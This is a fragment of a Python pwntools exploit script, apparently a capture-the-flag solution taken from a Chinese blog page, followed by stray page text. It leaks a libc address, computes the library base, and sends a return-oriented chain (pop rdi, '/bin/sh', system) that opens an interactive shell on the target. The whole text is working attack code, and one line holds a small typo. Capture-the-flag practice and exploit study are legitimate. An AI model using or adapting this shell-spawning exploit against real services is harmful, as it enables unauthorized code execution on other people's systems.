exploit(-2,'A'*0x8,0x004142,'B')
io.recvuntil('A'*0x8)
libc_base = u64(io.recv(6)+b2*'\x00') - 528426
libc = ELF('libc.so.6')
io.recvuntil(')')
io.sendline('n')
pop_rdi=rdi =libc_base+0x2a3e5
retu=pop_rdi+1
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search(b'/bin/sh'))
pay=p64(pop_rdi)+p64(bin_sh)+p64(system)
exploit(-4,'B'*0x10,rdi+1,b'A'*7+p64(retu)*3+pay)
io.interactive()
3638
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
